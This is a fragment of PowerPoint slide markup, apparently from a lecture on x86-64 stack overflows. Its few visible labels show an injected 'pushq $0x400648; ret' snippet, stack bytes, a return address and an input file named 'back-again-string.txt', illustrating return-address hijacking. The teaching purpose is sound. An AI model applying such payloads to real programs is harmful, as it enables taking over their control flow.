              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pushq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> $0x400648; ret</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F8 DF FF FF FF 7F 00 00   // this return address is on the stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60572507-0675-2548-9F59-997557C6BAEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1501620"/>
            <a:ext cx="2086918" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>back-again-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>string.txt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Group 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66D09A86-9C7F-054C-98E6-E4A16CBA26EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5553649" y="6163068"/>
            <a:ext cx="2675634" cy="369332"/>
            <a:chOff x="8434922" y="6044017"/>
            <a:chExt cx="2675634" cy="369332"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="129" name="TextBox 128">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{099C70A7-FDE0-5042-BFFD-587F5EA7C35A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8706500" y="6044017"/>
              <a:ext cx="2404056" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>%</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1"/>
                <a:t>rsp</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t> = 0x7FFFFFFFDFF0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="130" name="Straight Arrow Connector 129">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4A5197B-3FA3-5548-B2C8-AAA7463FD348}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:stCxn id="129"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671CA3DC-3C24-5948-87D6-1EBD17C234A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="701387" y="2762324"/>
            <a:ext cx="4830980" cy="3967780"/>
            <a:chOff x="686819" y="2753696"/>
            <a:chExt cx="4830980" cy="3967780"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="139" name="Group 138">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{496DCCF6-EFD4-6247-8EB0-8FD60F007718}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="686819" y="5129253"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="176" name="Rectangle 175">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C1DAE9D-04BA-754A-B956-C7A4683D4DAB}"/>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7" name="Rectangle 176">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A457A33C-9972-2F4C-B845-977831DC0227}"/>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8" name="Rectangle 177">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{564380AD-8162-014F-AE79-4FB3475A39BB}"/>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79" name="Rectangle 178">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E54463DF-4897-6649-957F-1A09CEB6DDB5}"/>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0" name="Rectangle 179">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E9DE822-28C0-914D-A45D-3D93041260BB}"/>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1" name="Rectangle 180">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F199D4D-1F86-FE40-A643-123ECD5EB3DD}"/>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2" name="Rectangle 181">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56889630-7ACF-7340-8B3B-18A04B6B10E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183" name="Rectangle 182">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7164F572-0E4B-4A44-A336-224A73B5FEB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40" name="Group 139">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17AABFC5-2145-5543-9530-49FC551A6748}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="686819" y="5927470"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="168" name="Rectangle 167">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20547F0F-8491-D94E-B766-6ED3E91C275C}"/>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9" name="Rectangle 168">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B469E899-55D1-3843-9F38-449BE38931E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0" name="Rectangle 169">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3887F0B-CC49-5B41-A96F-932F05295EB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1" name="Rectangle 170">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A216BBF-9D8B-7C46-B71D-569D91439F25}"/>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2" name="Rectangle 171">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A522567A-FC73-1945-B7FC-2BC5EA1F76A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3" name="Rectangle 172">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C2CD819-9F61-F342-8CCD-4B2092451409}"/>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4" name="Rectangle 173">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93B86213-339B-014A-A201-38CBFCABB29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75" name="Rectangle 174">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D5D8B36-05A6-8745-AACA-43A0C819B9DF}"/>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1" name="Group 140">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1A7CFCB-378B-244F-92BB-A23DD5441EE4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="686819" y="4335234"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="160" name="Rectangle 159">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{271B7355-D631-D640-9515-C93C2FE929E1}"/>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1" name="Rectangle 160">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75AE73D3-BBEF-E149-A424-B5B1B08BF3B3}"/>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2" name="Rectangle 161">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1C3A5F4-288A-DD4F-9E72-F87FBD2C88E7}"/>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3" name="Rectangle 162">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0438AC92-FE86-F945-AC24-FCA15EB01A0E}"/>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4" name="Rectangle 163">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D717961-B649-FE4A-B4D4-F378426D936E}"/>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5" name="Rectangle 164">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A36878D-424E-0044-9191-33F1CA182550}"/>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6" name="Rectangle 165">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B91BC67E-3739-B74E-A7DF-C3F489A9154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67" name="Rectangle 166">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2011E179-5B00-4343-A6D4-78EA9E8143B9}"/>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nvGrpSpPr>
            <p:cNvPr id="142" name="Group 141">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF1B598B-6852-0542-AEFD-2E284B358132}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="686819" y="3539123"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="152" name="Rectangle 151">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1E77F7A-0BBE-914E-9F0C-161E317B9429}"/>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3" name="Rectangle 152">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06F2F73E-EBEA-8D45-9A06-411F13B296B6}"/>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4" name="Rectangle 153">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2164AF71-4BA6-0B47-87F8-7A7BA40D7A48}"/>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5" name="Rectangle 154">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57C60C54-10A6-574D-9E02-9B9DF261EC10}"/>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6" name="Rectangle 155">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05A71C11-2A00-D24F-B86C-D5812E94DEF1}"/>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157" name="Rectangle 156">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{894FD6D3-FF03-7045-BF1D-76485925D2A6}"/>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158" name="Rectangle 157">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EF55345-1776-B645-8D88-C7AF154D868D}"/>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159" name="Rectangle 158">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB61455A-8E63-5F4A-ACEE-0CCE8749534D}"/>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nvGrpSpPr>
            <p:cNvPr id="143" name="Group 142">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB276049-8133-6448-A34A-ED699EC61AAC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="686819" y="2753696"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="144" name="Rectangle 143">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB652165-EDA0-ED40-80BC-16FE2D698A5B}"/>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5" name="Rectangle 144">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13D4E2F0-1030-4049-88FB-4338F1F08DA0}"/>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6" name="Rectangle 145">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32422BC4-B505-3F46-9CCE-1A0288EB87BD}"/>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7" name="Rectangle 146">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B81D6E3F-5C63-AC44-9890-91A5B734F596}"/>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8" name="Rectangle 147">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B281951-06F1-8444-8236-98B3E650DA73}"/>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9" name="Rectangle 148">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{043FA423-674D-A541-93AF-3EAD8871BD0F}"/>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0" name="Rectangle 149">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15EE8274-0DB9-BE4C-91E7-6FE1CB886A80}"/>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51" name="Rectangle 150">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46BAA690-30C7-DD44-8890-C188B61AF34A}"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Group 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7F5F986-0C40-4A4E-8C69-75165267B0C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="703315" y="2762324"/>
            <a:ext cx="4830980" cy="3967780"/>
            <a:chOff x="686819" y="2753696"/>
            <a:chExt cx="4830980" cy="3967780"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="91" name="Group 90">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BCD9C3E-3B1D-F24E-B15E-A13E5DB46D38}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="686819" y="5129253"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="119" name="Rectangle 118">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8798719-58B1-8047-8AFC-720102AC436F}"/>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0" name="Rectangle 119">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B9999F4-C43F-8C43-A612-F8E268EF7455}"/>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1" name="Rectangle 120">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{501549A8-A912-E14F-AA6C-B65B19C8977F}"/>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C3</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FFFF00"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>???</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="122" name="Rectangle 121">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2856C57E-901E-8F49-A3DA-DD549F9091D3}"/>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123" name="Rectangle 122">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6440F587-5219-134B-9CB8-3C88B7286D1D}"/>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40</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FFFF00"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>'@'</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="124" name="Rectangle 123">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18AD5693-8410-604D-9AA9-3E78E62D5184}"/>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06</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FFFF00"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>ACK</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="125" name="Rectangle 124">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02FDB8B8-E300-904D-8DCE-60E404AFAD7C}"/>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sp>
            <p:nvSpPr>
              <p:cNvPr id="126" name="Rectangle 125">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE810DD0-3596-BD4E-9657-219F3636EBDB}"/>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grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="92" name="Group 91">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A97AF6B-F575-1E49-BBB8-E941D62038D4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="686819" y="5927470"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="111" name="Rectangle 110">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67787237-3456-3742-8C8C-851AEE8B0105}"/>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2" name="Rectangle 111">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB2FB27C-8327-6C43-BE9C-FADF80C7614A}"/>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3" name="Rectangle 112">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90BFF62C-C063-5C4A-9ACC-15A24478B986}"/>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4" name="Rectangle 113">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D01DEE41-2798-6D41-9783-B5AB8B7F9ACA}"/>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5" name="Rectangle 114">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24982B7E-060D-B545-9C7B-8682A8F9772F}"/>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6" name="Rectangle 115">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B207072B-186E-2844-A40A-7C174A2ECACA}"/>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7" name="Rectangle 116">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CF6B51A-D9EB-EB47-B3F7-2ECFC0F4892F}"/>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18" name="Rectangle 117">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC6E6786-9D11-0F4C-8550-74EF2D1E4E27}"/>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93" name="Group 92">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BB48FA2-1A3D-BF47-8BFF-16757EDA3401}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="686819" y="4335234"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="103" name="Rectangle 102">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87493E35-F098-FA4C-ADE4-55721E9751AF}"/>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4" name="Rectangle 103">
                <a:extLst>
